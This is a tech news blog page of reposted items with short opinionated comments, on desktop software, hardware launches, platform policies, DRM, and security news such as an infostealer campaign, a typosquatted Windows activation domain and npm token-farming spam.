GNOME and Firefox Consider Disabling Middle Click Paste By Default

Posted on by

Both GNOME and Firefox are considering disabling middle-click paste by default, arguing it’s a confusing, accident-prone X11 relic that dumps clipboard contents without warning. Phoronix reports: A merge request for GNOME’s gsettings-desktop-schemas was opened this weekend to disable the primary-paste functionality by default that allows using the middle mouse button for pasting. Jordan Petridis argued in that GNOME pull request that middle-click paste is an “X11’ism” and that the setting could remain for those wanting to opt-in to enabling the functionality […].

The gsettings set org.gnome.desktop.interface gtk-enable-primary-paste true command would be a way of restoring the primary paste (middle click paste) for those desiring the functionality. The decision over the default has been tasked to GNOME’s design team for consideration.

Separately, Mozilla is also considering disabling middle mouse button paste by default too. […] Another option being considered is having the option to enable/disable it at either the GTK toolkit level or Wayland compositor level.

Looking at the comments, this is a hugely controversial move being pushed by the authors without any recognition that many people actually love having 2 clipboards. It may have been around for a long time, but this is a well used feature. The keyboard has been around for a long time, but no reason to say: hey, it’s old. Let’s sets a chorded keyboard as the default.

HP PC-in-a-keyboard for business

Posted on by

Announced on Monday at CES 2026, the HP EliteBoard G1a looks like a standard desktop keyboard, complete with 93 keys, including a number pad. Its keys have a solid 2 mm of travel, more than most laptops, and felt OK to type on during our brief hands-on, but it’s not mechanical so isn’t the best keyboard money can buy. However, look at the back surface and you’ll notice a small vent where air comes out and either two USB-C ports, or, on some SKus, a single port with a built-in USB-C cable that hangs off it like a tail.

HP EliteBoard G1a

HP EliteBoard G1a

The idea is that you plug the EliteBoard G1a into a monitor that has USB-C video input and allow it to send data and get power over a single wire. Connect a wireless mouse and you’ve got your workstation covered. Maintain a similar monitor and mouse setup at home and you can carry just the keyboard back and forth.

If your monitor, like the majority on the market, doesn’t have a USB-C input, you can use an included USB-to-HDMI adapter to connect. You can use a 65 W USB-C power adapter to juice the G1a if it’s not getting electricity directly from the monitor.

The G1a weighs between 1.49 and 1.69 pounds, depending on config, and measures 14.1 in x 4.7 in x 0.7 inches, so it is more portable than most laptops, though it is longer and thicker than some. At its CES preview, HP showed off a long, thin envelope you can use to carry it and said it would also fit into any laptop bag that holds a 16-inch or larger laptop.

HP EliteBoard G1a

HP EliteBoard G1a

The G1a comes powered by an AMD Ryzen AI 5 or 7 (330, 340, or 350 Pro) with integrated AMD Radeon 800 graphics and an NPU that runs at up to 50 TOPS (Trillion Operations Per Second). Those specs make it a Copilot+ PC by Microsoft’s standards, which means you get certain offline AI features like Microsoft Recall, Click to Do, and Windows Studio Effects. You can get it with up to 64 GB of DDR5 5600 MT/s RAM and up to 2 TB of SSD storage, along with Wi-Fi 6E or 7 connectivity.

[…]

You’ll also be able to configure the G1a with or without a 32 Wh battery that HP claims can offer up to 3.5 hours of unplugged use or two days in sleep. It’s difficult to imagine a scenario where you’d need to use the keyboard without a power source, but having it be asleep while you carry it from one destination to another would be a huge plus.

[…]

Source: HP pushes PC-in-a-keyboard for businesses with hot desks • The Register

This is an absolutely brilliant idea.

One criminal stole info from 50 orgs thanks to no MFA

Posted on by

If you don’t say “yes way” to MFA, the consequences can be disastrous. Sensitive data belonging to about 50 global enterprises is listed for sale – and, in some cases, has already been sold – on the dark web following a major infostealer campaign, with apparent victims including American utility engineering firm Pickett and Associates; Japan’s homebuilding giant Sekisui House; and Spain’s largest airline Iberia.

The thief, who goes by the moniker Zestix or Sentap, steals data from corporate file-sharing portals by using compromised cloud credentials obtained from information-stealing malware. And none of the purported victims enforced multi-factor authentication (MFA), according to Hudson Rock, an Israeli cybersecurity company that specializes in infostealers.

Stolen credentials combined with a lack of MFA are always a recipe for disaster, as we have seen in earlier big breaches such as Change Healthcare, British Library, and Snowflake customers’ database hacks.

“Because the organizations listed below did not enforce MFA, the attacker walks right in through the front door,” the cybersecurity shop said in a Monday report. “No exploits, no cookies – just a password.”

We’re told Zestix gains access after employees inadvertently download infostealer-laden files to their devices. The stealer malware, such as RedLine, Lumma, or Vidar, then snarfs up saved credentials and browser history.

The cybercriminal, who has been operating as an initial access broker and extortionist since at least 2021, specifically targets enterprise file synchronization and sharing (EFSS) platforms like Progress Software’s ShareFile, Nextcloud, and OwnCloud.

[…]

Credential hygiene

The report illustrates the growing problem with infostealers, a favorite method of ransomware gangs and other financially motivated criminals.

It also highlights the growing trend of criminals simply logging in – not breaking in – to cloud accounts, which security experts have been warning about for the past couple of years.

Plus, as Hudson Rock reports, “while some credentials were harvested from recently infected machines, others had been sitting in logs for years, waiting for an actor like Zestix to exploit them.” This, the team adds, shows a “pervasive failure” in corporate credential hygiene with organizations neglecting to rotate passwords and invalidate sessions.

“It is time for organizations to enforce MFA and monitor their employees’ compromised credentials,” the security firm notes. We couldn’t agree more. ®

Source: One criminal stole info from 50 orgs thanks to no MFA • The Register

VW’s New Year’s Resolution Is to Bring Back Physical Buttons

Posted on by
  • Volkswagen revealed a new generation of cockpit design with the refreshed ID. Polo.
  • The new design marks a big departure for VW and features a plethora of physical controls rather than the capacitive buttons on current models.
  • While the switchgear is currently only found on the new ID. Polo, which isn’t sold in the United States, it could debut on the soon-to-be-refreshed ID.4.

Volkswagen is making a drastic change to its interiors, or at least the interiors of its electric vehicles. The automaker recently unveiled a new cockpit generation with the refreshed ID. Polo—the diminutive electric hatchback that the brand sells in Europe—that now comes with physical buttons.

2027 volkswagen id polo

Volkswagen

While VW certainly isn’t the only automaker that pushed the envelope with haptic controls and digital buttons, it was a particularly egregious offender. Now, the company is doing a complete 180-degree shift, adding a full suite of physical buttons and switchgear to the Polo’s interior.

The steering wheel gets new clusters of buttons for cruise control and interacting with music playback, while switches for the temperature and fan speed now live in a row along the dashboard. The move back to buttons doesn’t come out of nowhere. Volkswagen already started the shift with the new versions of the Golf and Tiguan models in the United States. Unfortunately, some climate controls, such as those for the rear defrost and the heated seats, are still accessed through the touchscreen. Thankfully, they look to retain their dedicated spot at the bottom of the display.

2027 volkswagen id polo

Volkswagen

Volkswagen hasn’t announced which models will receive the new cockpit design. The redesigned interior also may be limited to the brand’s electric vehicles, which would limit it to the upcoming refresh for the ID.4 SUV (and potentially the ID.Buzz), as the only VW EV models currently sold in America.

Source: VW’s New Year’s Resolution Is to Bring Back Physical Buttons

Also unfortunately, the music control buttons seem to be limited to the steering wheel. Having your passenger reach out to select a radio station on your steering wheel feels suboptimal to me. But it’s a start.

Vietnam forces video ads to be shorter than 5 seconds and easy to close

Posted on by

The Government has just issued Decree No. 342 detailing a number of articles of the Advertising Law, which for the first time set strict requirements for advertising on the network environment. Notably, platforms are not forced users to view ads for more than 5 seconds and must allow to turn off ads with just 1 touch.

[…] Do not “force” users to watch ads for more than 5 seconds

One of the notable new points of the Decree is the specific regulation of non-positional advertising – the type of ad appears at the location, the time is not fixed, can obscure the whole or part of the main content and interrupt the user experience.

According to the new decree from February 15, social media users will not be disturbed with long promotional videos, uncensored content. Illustration: lectnews
From February 12, according to the new Decree, users will not be bothered with long promotional videos, uncensored content – Illustration

Article 17 of the Decree requires platforms to design features, clear ad-off icons, ensuring users only need one interaction to be able to turn off ads. It is strictly forbidden to use the symbol to turn off fake ads, confusing or difficult to recognize.

In particular, the Decree stipulates that there is no waiting time to turn off ads for stilltomers. With moving or video image-chain ads, the maximum standby time to turn off ads is only 5 seconds.

In addition, platforms must be clearly arranged and guided by users of advertising reports that violate the law, while also allowing the choice of rejection, turning or not continuing to view inappropriate ads. These reflections must be received, promptly processed and notified to the user in accordance with regulations.

[…]

Source: From 15/2, video ads are not forced users to watch for more than 5 seconds – Women’s Newspaper

Google starts to close Android sources, will only release code twice a year now

Posted on by

The operating system that powers every Android phone and tablet on the market is based on AOSP, short for the Android Open Source Project. Google develops and releases AOSP under the permissive Apache 2.0 License, which allows any developer to use, modify, and distribute their own operating systems based on the project without paying fees or releasing their own modified source code. Since beginning the project, Google released the source code for nearly every new version of Android for mobile devices, typically doing so within days of rolling out the corresponding update to its own Pixel mobile devices. Starting this year, however, Google is making a major change to its release schedule for Android source code drops: AOSP sources will only be released twice a year.

Google told Android Authority that, effective 2026, Google will publish new source code to AOSP in Q2 and Q4. The reason is to [blah blah bullshit]

[…]

Source: Google will now only release Android source code twice a year

With competition getting under way by the likes of Sailfish to satisfy an increasing amount of people seeking to get out from under the thumbs of Android and IOS, Google is closing the system so that alternatives can’t use their work in helping creating better products.

Lenovo Ultrawide Gaming Laptop That Uses a Rollable Screen

Posted on by

Lenovo wants to make rolling screens more ubiquitous. These flexible screens can extend out from their normal aspect ratio, so a device like the ThinkBook Gen 6 Rollable can go from a 14-inch laptop to a 16-inch screen. Gamers, on the other hand, may want something wider than taller. Lenovo’s latest concept accomplishes just that, and it makes more sense than you may initially think.

Lenovo’s Legion Pro Rollable concept is essentially the company’s existing Legion Pro 7i, but the 240Hz OLED screen is replaced with a flexible display. In its default state, the screen sticks to the standard 16 inches. With a press of the Fn and arrow keys, you can extend the screen to a further 21.5 inches in “tactical” mode and 24 inches in “arena” mode. At its max width, the screen appears far more like my typical desktop monitor—wide enough for my gaming habits.

Lenogo Legion Pro Rollable 2
These two wings expand thanks to an internal pulley system that pulls the screens in and out of the laptop lid. © Kyle Barr / Gizmodo

The mechanism inside the laptop lid is similar to what Lenovo has tried with its ThinkPad Rollable XD concept. It’s using high-tensile cables and a system of pulleys to drag the displays into place. This is an early concept, and some features don’t work like you imagine they would.

[…]

Without getting hung up on the details, the Legion Pro Rollable is the kind of concept that’s helping me maintain an ounce of excitement for gaming laptops. Having used the ThinkBook Rollable, I know that having variable screen sizes is more useful than you may initially think. The Legion Pro Rollable is being marketed for esports

[…]

Source: Lenovo Thinks You Want an Ultrawide Gaming Laptop That Uses a Rollable Screen

HSBC blocks app users for having sideloaded password manager

Posted on by

[…] Neil Brown, board member at F-Droid, said he was blocked from accessing HSBC’s UK mobile banking after a security screen flagged Bitwarden as a risk. Brown had installed the password manager via F-Droid rather than Google Play.

Bitwarden, an open source password manager, is available through official channels including Google Play and Galaxy stores, as well as via F-Droid sideloading.

HSBC didn’t provide The Register with a clear answer on why it won’t allow a sideloaded Bitwarden installation to coexist with its app on the same device.

Representatives from both F-Droid and Bitwarden suspect the issue stems from HSBC’s side.

Gary Orenstein, chief customer officer at Bitwarden, told us: “It seems that HSBC has chosen a level of security and permissions for their mobile app that allows the HSBC app to see if there are other apps on the phone not installed from the Google Play store, and if one is found, to disallow the install of the HSBC app.”

[…]

Source: HSBC blocks app users for having sideloaded password manager • The Register

There are many great reasons to install apps from things that aren’t the Google Play Store, privacy and freedom of choice being a major one – especially with people trying to escape the Google / Apple duopoly by jumping to other OSs like Sailfish (on the Jolla Phone). Not being able to access your banking app is a major problem. I guess it’s time to start changing banks as well then!

MacOS Logitech mice stop working due to cloud certificate being invalid. Apple shakedown turns hardware into junk.

Posted on by

If you’re among the macOS users experiencing some weird issues with your Logitech mouse, then good news: Logitech has now released a fix. This comes after multiple Reddit users reported yesterday that Logi Options Plus — the app required to manage and configure the controls on Logitech accessories — had stopped working, preventing them from using customized scrolling features, button actions, and gestures.

One Reddit user said that the scroll directions and extra buttons on their Logitech mouse “were not working as I intended” and that the Logi Options Plus app became stuck in a boot loop upon opening it to identify the cause. Logitech has since acknowledged the situation and said that its G Hub app — a similar management software for gaming devices under the Logitech G brand — was also affected.

According to Logitech’s support page, the problem was caused by “an expired certificate” required for the apps to run. Windows users were unaffected. The issues only impacted Mac users because macOS prevents certain applications from running if it doesn’t detect a valid Developer ID certificate, something that has affected other apps in the past.

So Apple requires the maker of hardware to pay them a subscription to be able to use the hardware?! It’s a mouse, not a piece of rocket science! If your hardware supplier goes bust, your hardware turns into junk.

This Free Script Disables Every AI Feature in Windows 11

Posted on by

If you’d like your operating system to go back to being an operating system, check out
RemoveWindowsAI. This free script changes various registry keys to disable AI features including Copilot, Recall, and the Copilot integrations in applications including Edge, Paint, and Notepad. Using various workarounds , it then configures Windows Update to not install those updates again (the documentation breaks the process down, if you’re interested).

[…]

To start the script you will need to copy a command from the Github page for RemoveWindowsAI and paste it into your PowerShell window (I’m not including the command directly here in case it changes in the future). Once you do, the user interface will show up, allowing you to choose which AI features you want to disable. Make your choices and watch the changes take place in the PowerShell window.

[…]

Source: This Free Script Disables Every AI Feature in Windows 11 | Lifehacker

The Pebble Round 2 is here, and it fixes the original’s biggest flaws

Posted on by

2025 was a surprisingly big year for Pebble fans. Last March, former Pebble CEO Eric Migicovsky unexpectedly launched two new Pebble smartwatches: the Pebble 2 Duo and the Pebble Time 2. Now, on just the second day of 2026, Migicovsky has announced a third Pebble smartwatch — the Pebble Round 2.

For all intents and purposes, the Pebble Round 2 is a spiritual successor to the Pebble Time Round, Pebble’s excellent circular smartwatch that was released in 2015. At first glance, the new watch looks indistinguishable from its older sibling. However, there are a couple of key upgrades that fix the original Pebble Time Round’s biggest flaws.

The first is the display. Where the Pebble Time Round featured a 1-inch screen, the Pebble Round 2 has a 1.3-inch screen. A 0.3-inch size upgrade may not sound like much on paper, but as you can see from the photos above, it’s a night-and-day difference when looking at the Pebble Round 2 and Pebble Time Round side by side — largely thanks to the drastically reduced bezels on the new watch.

In addition to the larger size, the Pebble Round 2’s screen is also higher quality, featuring a 260 x 260 resolution that’s twice as sharp as the OG Pebble Time Round. The screen is also now optically bonded, resulting in greatly improved viewing angles compared to the previous model.

The other big upgrade is battery life. Migicovsky says the Pebble Round 2 should last 10 to 14 days per charge, a massive increase over the two days of battery life provided by the original Pebble Time Round (primarily due to newer, more efficient Bluetooth technology). Although it’s not as impressive as the 30-day battery life offered by the other two Pebble watches announced a few months ago, it’s still incredible endurance considering how light and thin the Pebble Round 2 is.

[…]

It has step and sleep tracking, a compass, two microphones, and 30m water resistance. Compared to the Pebble Time 2, the two most prominent missing features on the Pebble Round 2 are a heart rate monitor and a speaker.

[…]

Source: The Pebble Round 2 is here, and it fixes the original’s biggest flaws

LG forced a Copilot web app onto its TVs but will now let you delete it

Posted on by

LG says it will let users delete the Microsoft Copilot shortcut it installed on newer TVs after several reports highlighted the unremovable icon. In a statement to The Verge, LG spokesperson Chris De Maria says the company “respects consumer choice and will take steps to allow users to delete the shortcut icon if they wish.”

Last week, a user on the r/mildlyinfuriating subreddit posted an image of the Microsoft Copilot icon in their lineup of apps on an LG TV, with no option to delete it. “My LG TV’s new software update installed Microsoft Copilot, which cannot be deleted,” the post says. The post garnered more than 36,000 upvotes as people grow more frustrated with AI popping up just about everywhere.

Both LG and Samsung announced plans to add Microsoft’s Copilot AI assistant to their TVs in January, but it appears to be popping up on LG TVs following a recent update to webOS.

De Maria adds that the icon is a “shortcut” to the Microsoft Copilot web app that opens in the TV’s web browser, rather than “an application-based service embedded in the TV.” He also adds that “features such as microphone input are activated only with the customer’s explicit consent.”

Asked when LG will start letting users delete the Copilot icon, De Maria said there’s no “definitive timing” yet.

Here’s LG’s full statement:

Following recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we’re reaching out to provide an important clarification. Based on recent coverage regarding the arrival of Microsoft Copilot on LG TVs, we want to clarify that Microsoft Copilot is provided as a shortcut icon to enhance customer accessibility and convenience. It is not an application-based service embedded in the TV. When users select the Copilot shortcut, Microsoft’s website opens through the TV’s web browser, and features such as microphone input are activated only with the customer’s explicit consent.

Source: LG forced a Copilot web app onto its TVs but will let you delete it | The Verge

Apple becomes a debt collector with its new developer agreement, could randomly deduct money it believes it should get if devs use external payment processor or app store

Posted on by

Apple on Wednesday released an updated developer license agreement that gives the company permission to recoup unpaid funds, such as commissions or any other fees, by deducting them from in-app purchases it processes on developers’ behalf, among other methods.

The change will impact developers in regions where local law allows them to link to external payment systems. In these cases, developers must report those payments back to Apple to pay the required commissions or fees.

The changed agreement seemingly gives Apple a way to collect what it believes is the correct fee if the company determines a developer has underreported their earnings.

Apple’s policies in this area are complex, but the change could impact developers in markets like the EU, U.S., and, now, Japan, where developers using external payment systems may be required to pay Apple varying fees or commissions depending on local law. (In the U.S., the legality of these commissions is still being disputed. A federal appeals court earlier this month ruled that a district court should consider allowing Apple to collect some commission, though not the full 27% fee it previously charged.)

In its new developer agreement, Apple states it will “offset or recoup” what it believes it is owed, including “any amounts collected by Apple on your behalf from end-users.” This means Apple could recoup funds from developers’ in-app purchases — like those for digital goods, services, and subscriptions — or from one-time fees for paid applications.

Additionally, Apple notes that it has the right to collect this money “at any time” and “from time to time,” meaning developers could face surprise deductions if Apple believes they’ve miscalculated what they owe.

The agreement doesn’t specify how Apple will determine whether it’s owed money.

The types of developer payments that vary over time are limited and include commissions, fees, and taxes. Among these is the Core Technology Fee (CTF) in the EU, which currently costs €0.50 for each first annual install exceeding one million in the past 12 months. In January 2026, Apple will transition from the CTF to a new fee, called the Core Technology Commission (CTC), a more complicated percentage-based fee. Apple will collect the CTC from apps that use external payment methods or are distributed under its alternative business terms for the EU.

The updated developer agreement also gives Apple the right to collect unpaid amounts from any “affiliates, parents, or subsidiaries” related to the account that owes money. In practical terms, that means Apple could collect the money from developers’ other apps, or from apps published by a parent company.

[…]

Source: Apple becomes a debt collector with its new developer agreement | TechCrunch

So after being forced by the EU (and others) to allow external payment providers and app stores, Apple then went into a tissy fit and started stamping it’s feet against these rulings, trying everything to keep extorting anyone selling anything on an IOS device. Now it’s just going to take what it believes is theres – and you had better believe there will be no recourse.

Apple thinks it can argue its’ way out of EU DMA with a single comma. No it can’t and this fight will cost it billions in Europe

EU to force Apple to open up IOS for developers

Apple tries again to make EU officials happy with new fees for in-app purchases

Apple stamps feet but now to let EU developers distribute apps from the web

Apple reverses hissy fit decision to remove Home Screen web apps in EU

EU forces Apple to open up to third-party app stores and payments. Details emerge what it will look like.

I can have app store? Apple: yes but NO! Give €1,000,000 + lock in to Apple ecosystem. This is how to “comply” with EU anti competition law

 

Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars

Posted on by

[…] if it were in our solar system, it could travel from Earth to the Moon in 14 minutes. This supermassive black hole, weighing as much as 20 million Suns, has left behind a never-before-seen 200,000-light-year-long “contrail” of newborn stars, twice the diameter of our Milky Way galaxy. It’s likely the result of a rare, bizarre game of galactic billiards among three massive black holes.

Rather than gobbling up stars ahead of it, like a cosmic Pac-Man, the speedy black hole is plowing into gas in front of it to trigger new star formation along a narrow corridor.

[…] Nothing like it has ever been seen before, but it was captured accidentally by NASA’s Hubble Space Telescope.

This illustration shows a black field speckled with white, yellow and red galaxies. A black hole, near the left, bottom corner of the image, plows through space, leaving a diagonal trail of newborn stars stretching back to the black hole's parent galaxy.

This is an artist’s impression of a runaway supermassive black hole that was ejected from its host galaxy as a result of a tussle between it and two other black holes. As the black hole plows through intergalactic space it compresses tenuous gas in front of it. This precipitates the birth of hot blue stars. This illustration is based on Hubble Space Telescope observations of a 200,000-light-year-long “contrail” of stars behind an escaping black hole.
NASA, ESA, Leah Hustak (STScI)

“We think we’re seeing a wake behind the black hole where the gas cools and is able to form stars. So, we’re looking at star formation trailing the black hole,” said Pieter van Dokkum of Yale University in New Haven, Connecticut. “What we’re seeing is the aftermath. Like the wake behind a ship we’re seeing the wake behind the black hole.” The trail must have lots of new stars, given that it is almost half as bright as the host galaxy it is linked to.

The black hole lies at one end of the column, which stretches back to its parent galaxy. There is a remarkably bright knot of ionized oxygen at the outermost tip of the column. Researchers believe gas is probably being shocked and heated from the motion of the black hole hitting the gas, or it could be radiation from an accretion disk around the black hole. “Gas in front of it gets shocked because of this supersonic, very high-velocity impact of the black hole moving through the gas. How it works exactly is not really known,” said van Dokkum.

“This is pure serendipity that we stumbled across it,” van Dokkum added. He was looking for globular star clusters in a nearby dwarf galaxy. “I was just scanning through the Hubble image and then I noticed that we have a little streak. I immediately thought, ‘oh, a cosmic ray hitting the camera detector and causing a linear imaging artifact.’ When we eliminated cosmic rays we realized it was still there. It didn’t look like anything we’ve seen before.”

A Hubble image of a black, deep-space field is speckled with galaxies and one, lone star. In the center of the image is a small, white-bordered, boxed area that contains one, long, thin, diagonal streak of whitish-blue stars and two galaxies. To the right of the small box is a larger, white-bordered box that contains a magnified view of the contents of smaller box.

This Hubble Space Telescope archival photo captures a curious linear feature that is so unusual it was first dismissed as an imaging artifact from Hubble’s cameras. But follow-up spectroscopic observations reveal it is a 200,000-light-year-long chain of young blue stars. A supermassive black hole lies at the tip of the bridge at lower left. The black hole was ejected from the galaxy at upper right. It compressed gas in its wake to leave a long trail of young blue stars. Nothing like this has ever been seen before in the universe. This unusual event happened when the universe was approximately half its current age.
NASA, ESA, Pieter van Dokkum (Yale); Image Processing: Joseph DePasquale (STScI)

Because it was so weird, van Dokkum and his team did follow-up spectroscopy with the W. M. Keck Observatories in Hawaii. He describes the star trail as “quite astonishing, very, very bright and very unusual.” This led to the conclusion that he was looking at the aftermath of a black hole flying through a halo of gas surrounding the host galaxy.

[…]

Source: Hubble Sees Possible Runaway Black Hole Creating a Trail of Stars – NASA Science

New Nintendo DRM allows them to remotely brick the device you bought permanently – you don’t own what you bought part XXX

Posted on by

In the lead up to its Switch 2 console release, Nintendo updated its user agreement and asserted broad authority to make consoles owned by its customers permanently unusable. Under Nintendo’s most aggressive digital restrictions management (DRM) update to date, game console owners are now required to give Nintendo the unilateral right to revoke access to games, security updates, and the Internet, at its sole discretion. The new agreement states:

“You acknowledge that if you fail to comply with [Nintendo’s restrictions], Nintendo may render the Nintendo Account Services and/or the applicable Nintendo device permanently unusable in whole or in part.”

These new, wide-sweeping restrictions affect a large number of users for many different reasons. There are probably other reasons that Nintendo has and will justify bricking game consoles, but here are some that we have seen reported:

  • “Tampering” with hardware or software in pretty much any way;
  • Attempting to play a back-up game;
  • Playing a “used” game; or
  • Use of a third-party game or accessory.

When Nintendo remotely bricks a perfectly-functional device, the game console becomes effectively useless. Users are blocked from ever accessing the Internet again with the system, which in turn restricts services like eShop (the digital distribution service for the Nintendo Switch), online play, using the subscription-based Nintendo Switch Online (which includes access to retro game catalogs and the ability to back up game data), game download (including previously-purchased codes and “game-key” cartridges ), and security patches. As if blocking Internet access alone wasn’t enough, a bricked device is no longer able to play downloaded games, either. These restrictions don’t just apply to the user who broke the Nintendo’s extremely strict user agreements: the block is for the life of the device, no matter who owns it.

A red brick on a wooden floor

No proprietor should have the power to brick your device at its discretion.

Nintendo’s promise to block a user from using their game console isn’t just an empty threat: it has already been wielded against many users.

[…]

Source: New Nintendo DRM bans consoles, makes users beg for forgiveness — Free Software Foundation — Working together for free software

Samsung is putting Google Gemini AI into your refrigerator and wine cellar, whether you need it or not

Posted on by

Samsung is heading into CES 2026 with a familiar message wrapped in a slightly stranger package. You see, the company plans to unveil an updated lineup of kitchen appliances, led by new versions of its Bespoke AI refrigerator, wine cellar, slide in range, and over the range microwaves. What makes this year different is not the stainless finish or the tighter installation tolerances. It is the decision to push Google Gemini directly into the kitchen, starting with a refrigerator that can see what you eat and tell the cloud about it. Yes, really.

At the center of the announcement is the latest Bespoke AI Refrigerator Family Hub from Samsung Electronics. Samsung says this model upgrades its existing AI Vision system with functionality built using Google Gemini, marking the first time Gemini is being integrated into a refrigerator. Previously, the system could recognize a limited number of fresh and pre registered foods locally. The new version is designed to identify more items automatically, including processed foods that no longer require manual setup and leftovers stored in personal containers.

On paper, that sounds convenient. A fridge that knows what is inside it, keeps an updated inventory, and helps manage groceries without constant user input is an idea appliance makers have chased for years. Samsung says more accurate ingredient recognition should make food tracking clearer and easier, while unlocking new use cases around meal planning and personalization. Whether that translates into daily value or becomes another ignored dashboard remains an open question.

Samsung is also extending the same vision based approach to its new Bespoke AI Wine Cellar. A camera mounted inside the unit scans bottle labels as wine is added or removed, tracking inventory through the SmartThings AI Wine Manager. The system knows which shelf each bottle sits on and can surface pairing suggestions based on what is currently stored. For collectors with larger wine inventories, this could genuinely save time. For everyone else, it may feel like a high tech solution searching for a problem.

The elephant in the room is cloud dependency. These AI features are built in collaboration with Google Cloud, which raises predictable questions about data handling, long term support, and what happens when services change or are discontinued. A refrigerator is expected to last many years. Cloud based AI services do not have the same track record. Samsung has not detailed how much processing happens locally versus in the cloud, nor how users can limit or disable data sharing if they choose.

[…]

Source: Samsung is putting Google Gemini AI into your refrigerator, whether you need it or not

Fake MAS Windows activation domain used to spread PowerShell malware

Posted on by

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the ‘Cosmali Loader’.

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called ‘cosmali loader’ because you mistyped ‘get.activated.win’ as ‘get.activate[.]win’ when activating Windows in PowerShell.

The malware’s panel is insecure and everyone viewing it has access to your computer.

Reinstall Windows and don’t make the same mistake next time.

For proof that your computer is infected, check Task Manager and look for weird PowerShell processes.

Based on the reports, attackers have set up a look-alike domain, “get.activate[.]win,” which closely resembles the legitimate one listed in the official MAS activation instructions, “get.activated.win.”

Given that the difference between the two is a single character (“d”), the attackers bet on users mistyping the domain.

Source: Fake MAS Windows activation domain used to spread PowerShell malware

Samsung Releases new Odyssey gaming monitors, including 27″ glasses free 3D

Posted on by

[…]

Samsung Odyssey 3D G9 – G90XF 27”

The Samsung Odyssey 3D G9 - G90XF 27'' gaming display lets you enjoy 3D without glasses.
The Samsung Odyssey 3D G9 – G90XF 27″ gaming monitor breaks new ground with glasses-free 3D. The technology incorporates eye tracking to create a striking depth effect in games and videos.

The 27″ (68cm) Samsung Odyssey 3D G9 – G90XF 4K UHD monitor features glasses-free 3D technology. Thanks to eye tracking and the View Mapping algorithm, the image adapts to the user’s position to create dynamic depth. It can also automatically convert 2D videos into 3D content thanks to AI processing. The screen uses an IPS panel with a refresh rate of 165Hz, a response time of 1 ms and 99% coverage of the sRGB space.

It is FreeSync Premium and G-Sync Compatible, guaranteeing smooth synchronization with the graphics card. Connectors include two HDMI 2.1 ports, one DisplayPort 1.4 and a USB port. The Reality Hub interface centralizes 3D functions and provides access to compatible games. It’s ideal for those who want to discover 3D without constraints, while retaining solid performance for gaming and multimedia uses.

[…]

Source: Samsung Odyssey: new 2025 gaming monitors – Son-Vidéo.com: blog

Tea – a way to secure FOSS by offering financial incentives – brews massive token farming campaigns (and dissolves them)

Posted on by

No good idea – like rewarding open source software developers and maintainers for their contributions – goes unabused by cybercriminals, and this was the case with the Tea Protocol and two token farming campaigns.

Both incidents gave the project’s founders a real-time view into how far – and fast – attackers will go to chase financial gain, and they helped shape “radical changes” that will roll out in the Tea network’s mainnet launch early next year, co-founder and CEO Tim Lewis told The Register.

The Tea Protocol was founded by Max Howell, who created open source package manager Homebrew, and Lewis, who established DEVxDAO, a non-profit that distributes grants to support decentralized computing projects, to reward open source developers and help secure software supply chains via financial incentives.

“When you think about the different package management ecosystems, they all have different gates in front of them, and none of them have been a financial gate,” Lewis said in an interview.

“There’s a human that sits in the front who has to be this gate, but it takes a toll on the human to go through all the data, and that’s only getting worse,” he said. “There’s the proliferation of the AI-induced pull requests, which are great, but that’s become like a DDoS attack.”

Last year, the duo rolled out the Tea Protocol testnet – essentially a test run for the incentives program that allows open source developers to earn cryptocurrency – specifically Tea tokens – for valuable code and fixes, while users can stake Tea to support specific projects and also earn rewards. A portion of the protocol rewards is shared with project maintainers and users who stake their tokens.

“Again, this was on a test network for fake internet points that could eventually potentially have some value,” Lewis said. “Our incentive for that period only lasted about three weeks.”

We got to watch this happen in real time, and we recognized how fast, how far people had gone to create scripts that have a worm-like behavior

In April 2024, the Tea team shut down the incentive program’s rewards after about 15,000 spammy packages flooded the npm registry to farm Tea points. These contained little or zero useful functionality, and were instrumented with “tea.yaml” metadata that linked back to Tea accounts in an attempt to inflate developers’ reputation and earn payouts.

“We got to watch this happen in real time, and we recognized how fast, how far people had gone to create scripts that have a worm-like behavior,” Lewis said.

Then it got worse. In 2025, the earlier Tea farming campaign grew into the IndonesianFoods and Indonesian Tea campaigns that polluted more than 1 percent of npm with spam packages. And in November, Amazon uncovered more than 150,000 malicious npm packages, all linked to another Tea token farming campaign, that the cloud giant described as “one of the largest package flooding incidents in open source registry history.”

“I view this as a canary in the coal mine,” Lewis said.

In these token farming campaigns, the fraudsters flooded registries with spam, as opposed to cryptocurrency- and other secret-stealing laced code –  and neither of the latter two is hypothetical. North Korea’s Lazarus Group and other sophisticated attackers have previously targeted npm for these illicit purposes.

“When you are a destructive organization like Lazarus Group, there’s incentive to use this same techniques to attack [supply chains],” Lewis said. “So we need to fix the core.”

How to reward secure code and penalize spam

To this end, Tea’s founders are working to fix the protocol’s design to ensure that the incentives program can’t be abused when the mainnet launches in early 2026.

This involves requiring packages and projects to pass ownership and provenance checks, and ensuring contributions aren’t just automated spam. The Tea team is also designing monitoring features that will check for Sybil attacks and flag surges in low-quality package creation and suspicious identities.

If malicious-looking patterns are detected, the developer won’t receive rewards and their registrations will be quarantined, pending further review.

Additional key quality and security improvements will happen via integration with PKGX, which Howell wrote. It’s a package runner that creates a containerized environment for projects and manages developer tools across environments. PKGX verifies maintainers using cryptographic signatures and identity checks, and also evaluates their contributions to various projects for quality, along with security posture and dependencies.

This registry will integrate directly with Tea upon the protocol’s mainnet launch, and will auto-detect and penalize, if needed, spammy packages at the point of registration – not after – while rewarding maintainers for their legit contributions.

Automated SBOMs, bug bounties

In the future, Lewis says that this design will also allow enterprises to automate bug bounties, and SBOMs (software bills of materials) that provide an inventory of all the components found in a piece of software. This will make it easier for large companies to map out their dependencies, and then reward developers for fixing any critical security issues they find.

[…]

“Some CISO, somewhere, every day is looking at his tens of thousands of packages that he approved for use, and now he’s responsible for whether or not these things are secure,” Lewis said. “He can’t have all the people that work within his department spend all of their time trying to get some guy in Nebraska to review a pull request and get the critical bug for his architecture solved en masse. We’re hoping this creates a tool that allows that value distribution without impermanent loss en masse.”

Lewis’ goal, he says, is to see upwards of “millions of dollars a day, retrieved for issue completion.”

